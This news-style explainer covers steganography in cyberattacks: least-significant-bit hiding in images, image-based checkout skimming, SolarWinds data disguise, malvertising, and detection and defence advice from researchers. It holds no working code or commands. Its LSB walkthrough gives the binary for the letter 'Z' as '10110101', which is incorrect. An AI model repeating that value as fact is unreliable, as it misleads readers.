Steganography is the practice of hiding sensitive or secret information inside something that appears ordinary. It’s also a hugely overlooked cyberthreat, according to Fred Mastrippolito, founder of cybersecurity firm Polito, Inc.
That’s because some cybercriminals prefer to sneak stolen data or malicious code in images, audio files and other normal-looking media to craftily evade detection.
What Is Steganography?
Cryptography happens when you can see information but not understand it. Steganography happens when information is hidden. A note written in a secret code is cryptography; a note written in invisible ink is steganography.
People exchanging private or sensitive information online use both methods. Apps including Zoom and WhatsApp use end-to-end encryption to encode messages, making them unreadable to anyone but the sender and the receiver. And residents of countries with internet censorship sometimes use steganography to bypass filters and firewalls.
What Is Steganography?
Technically, any sort of cybercrime that tricks users into downloading malware by visiting a normal-looking, non-secret web page or clicking on an innocuous attachment falls under the umbrella of steganography.
But usually, hackers reserve the fancier forms of steganography — like hiding code in an image file — for one-off, strategic targets. When cybersecurity specialists use the term, it’s usually in reference to these more advanced or surprising applications.
“We have seen it from targeted attackers, more sophisticated groups that are really trying hard to not necessarily play a numbers game, but to focus on a particular organization and exfiltrate data from it,” Kaspersky security researcher Kurt Baumgartner said. “In the past, that’s taken extra effort and extra talent. So it wasn’t quite as common, but it is becoming more common.”
Steganography takes more work than other types of cybercrime, so it will always be a less popular option, Mastrippolito said. But, as hackers find new ways to cloak malicious code or stolen data, we’re likely to see more of it — if we notice it’s happening, that is.
How Does Steganography Work?
How steganography works depends on the type of information that’s hidden and the type of file or site it’s hidden in. Many steganography methods hide information in images, for instance.
(For an ancient example, consider exiled Spartan king Demaratus who, upon learning that Xerxes the Great was planning to invade his homeland, sent two wax-covered slates to Sparta with absolutely nothing written on them — or so it seemed, until Gorgo, Queen of Sparta, thought to look under the wax and discovered a secret warning.)
“There are a lot of different ways to implement steganography — or the code itself — into the images, it just depends on what method the actor who creates that piece of code wants to use,” said Jon Clay, VP of threat intelligence at Trend Micro.
Hackers can hide data inside images using a technique called least significant bit (LSB). This method uses tiny changes to an image’s digital data to encode secret values. This research paper provides a simple example: Imagine a grayscale image, with each of its pixels assigned a color name consisting of eight “bits,” or ones and zeros. The first eight pixels of the image may look like this:
01010010 01001010 10010111 11001100 11010101 01010111 00100110 01000011
Now, let’s say someone wanted to use steganography to send a message beginning with the letter Z. Z’s binary name is “10110101.” So, by changing the last — or “least significant” — bit in a few of the pixels above, they can send the letter Z to anyone who knows the technique without changing the colors in the original image too much.
Scale that approach to an image with thousands of pixels, and they could hide a longer message or lines of code.
“There are a lot of different ways to implement steganography — or the code itself — into the images, it just depends on what method the actor who creates that piece of code wants to use.”
Of course, hiding information in an image’s data only works if no one suspects the original image has been tampered with. Anyone in the know could quickly decrypt the secret message and see what data or code is hidden inside.
How Is Steganography Used Today?
In 2018, cybersecurity Twitter freaked out a little when researcher David Buchanan figured out how to hide information in a JPEG image data that made it past Twitter’s thumbnail compressor. Buchanan tweeted an image of William Shakespeare that — when downloaded and unzipped — contained the playwright’s complete works.
“I think most people were impressed, and surprised that it was possible, due to the assumption that Twitter strips all metadata from image uploads,” Buchanan said.
Three years after his initial discovery, he found a way to tack on hidden information to the end of a PNG image’s metadata on Twitter. This method was even better than his first, he wrote, because the data remained “contiguous,” or all in one chunk.
Some security experts worried Buchanan’s Twitter techniques could help criminals attack companies or individuals, but Buchanan is unaware of any instances of that happening, he said.
In early 2020, for instance, a group believed to be Russian hackers hid malware inside a legitimate software update from SolarWinds, maker of a popular IT infrastructure management platform. The hackers successfully breached Microsoft, Intel and Cisco, as well as multiple U.S. government agencies. Then, they used steganography to disguise the information they were stealing as XML files, Baumgartner explained.
For hackers, hiding malicious code in an image or audio file is only half the battle. They also need a malicious or buggy program on the target’s computer to run that code. That’s why criminals use steganography to deliver bad software into systems that have already been compromised.
For example, a cyber-thief might try to deliver a PNG filled with bad code to a browser with a known vulnerability in how it loads PNGs. Or a hacker might break into a corporation’s network and then use malicious PNGs to sneak past security features and deliver even more malware.
For steganographically hidden code to be executed, there must be another compromised program to first decrypt it, then transfer control to that code, Mastrippolito explained. Once the bad code is running, it might take screenshots, tweet, access the clipboard, monitor keystrokes or try to take over an account. Then, it will likely send data back to a command-and-control server with a cloaked location. This all takes place in the background — so the target is unlikely to notice it happening — but all the pieces must be in place.
In short: Steganographic attacks require two steps, and that’s why steganography is often reserved for targeted attacks instead of blanket ones. Each hidden payload must be designed for a specific compromised system, and, once it’s delivered, it has to actually run.
Examples of Steganography in Cyber Attacks
Dutch cybersecurity firm Sansec discovered in September of 2020 that cybercrime groups were using image steganography to steal payment information from online stores’ checkout pages.
This type of “skimming” attack is common. In it, hackers add malicious software into the code of a retailer’s checkout page. When a shopper enters their payment details, those details are recorded and sent to a server in a remote location. Sansec founder Willem de Groot said the firm has detected more than 50,000 online stores in the last six years that have fallen victim to skimming malware.
There’s a bustling black market for that payment information, de Groot said.
“People hack into stores, people write malware, people provide third-party services to support this whole economic chain,” he explained.
And while thieves only earn between $5 and $30 for each intercepted credit card, a single person can target thousands of stores at once because the work — in this case, injecting the images and their malicious code — is almost entirely automated.
Some cybercriminals use steganography to break into a site or system — others use it to disguise the data they steal once they’re inside.
“Seeing [steganography] being used for exfiltrating and uploading stolen data is a little more unusual, but it does happen,” Baumgartner said.
For example, he’s seen bad actors disguise stolen data as outbound domain-name-system traffic, or the very common traffic that translates site and server names from human-speak into machine-speak.
A malvertising campaign hijacks ad-serving networks, injecting fake online ads to trick users into downloading malware. Clay has seen some of these campaigns use images to deliver their bad code.
“Steganography’s use within the [malvertising] threat community seems to be increasing,” he said. “We’ve seen a number of activities where the steganography malware has been inserted into the campaign at some stage.”
Tech companies have also used audio steganography — outside the frequency range that humans can hear — to communicate across devices. Amazon is suspected to have hidden an audio message in a Super Bowl commercial for voice assistant software Alexa to prevent viewers’ Amazon Echos from activating during the ad. And Indian ad company SilverPush got caught putting undetectable audio in TV and online ads so consumers’ phones could track which ads to retarget.
How Do Cybersecurity Specialists Detect Steganography?
Often, they don’t. By definition, effective steganography goes undetected.
But that doesn’t mean researchers aren’t trying. And advances in machine learning have made threat detection more accurate. Algorithms can ingest a bunch of data about how normal software behaves, which helps them notice abnormal software faster.
Sansec monitors more than a million online stores on a daily basis, de Groot said. Each morning, its machine-learning system flags anywhere from 50 to 100 stores with new malicious code added to their checkout pages. The Sansec team examines those sites manually, looking for any learnings that could improve its detection algorithms.
“Sometimes it takes hours to really establish whether malware is present or not, so clever are these hiding techniques.”
“Criminals come up with new methods every week,” de Groot said. “So it’s a very, very competitive cat-and-mouse game of staying ahead of the other party.”
Sansec flags potential steganographic attacks by checking for code that submits data to a different country than where a shop’s servers are located, for example, de Groot said. But criminals have “thousands of tricks” to disguise their code, and keeping up is difficult.
“Sometimes it takes hours to really establish whether malware is present or not, so clever are these hiding techniques,” de Groot said.
Another red flag, according to Baumgartner, is suspicious-looking traffic. Why is this server suddenly communicating with Pastebin or a WordPress blog? Malware also sometimes leaves behavior- or memory-based bread crumbs on the host computer.
Is Malicious Steganography Avoidable?
“There’s no way the typical user could detect this is happening,” de Groot said. And plenty of websites don’t have the resources for dedicated security teams.
The best defense for consumers is to update apps and operating systems when updates are available. For businesses, it’s to train employees about the cybersecurity dangers of normal-looking image and audio files.
“In normal business, your coworkers are not going to be very rigorous, saying, ‘Hey, you’ve got to open this.’”
“They may have been educated that if you get an executable file in an attachment, don’t open it. If you get a zip file in an attachment, don’t open it,” Clay said. “But maybe they haven’t been trained that if you get a JPEG or a BMP, these can also harbor some malicious code.”
If that’s too much, just make sure employees know to be suspicious of any message that pressures them to open an attachment quickly.
“In normal business, your coworkers are not going to be very rigorous, saying, ‘Hey, you’ve got to open this,’” Clay said.
What’s Next for Steganographic Cybercrime?
As audio-based apps (like Clubhouse, for instance) gain popularity and more platforms add audio features to their repertoires, audio-based steganographic attacks are likely to happen more often, Clay guessed.
Expanded use of augmented reality might be a cause for concern too. Bad actors could hide malicious code inside real-world objects so that when they’re scanned by compromised AR software, they deliver malware. This would be a really big problem in a world where autonomous vehicles scan physical objects to make decisions about where and how to drive. Researchers at the University of Washington and other institutions already published a paper outlining how black-and-white stickers on stop signs can cause the computer-vision algorithms in self-driving cars to misfire.
The good news is steganography is expensive to develop and tough to deploy. The bad news is it occasionally works, so cybercriminals will keep looking for new ways to use it.
“With this specific crime, the real challenge is happening behind the scenes, it’s out of view for most people,” de Groot said. “But the challenge is real, and a lot of people are working day and night to stay ahead of the other party.”
Dawn Kawamoto contributed reporting to this story.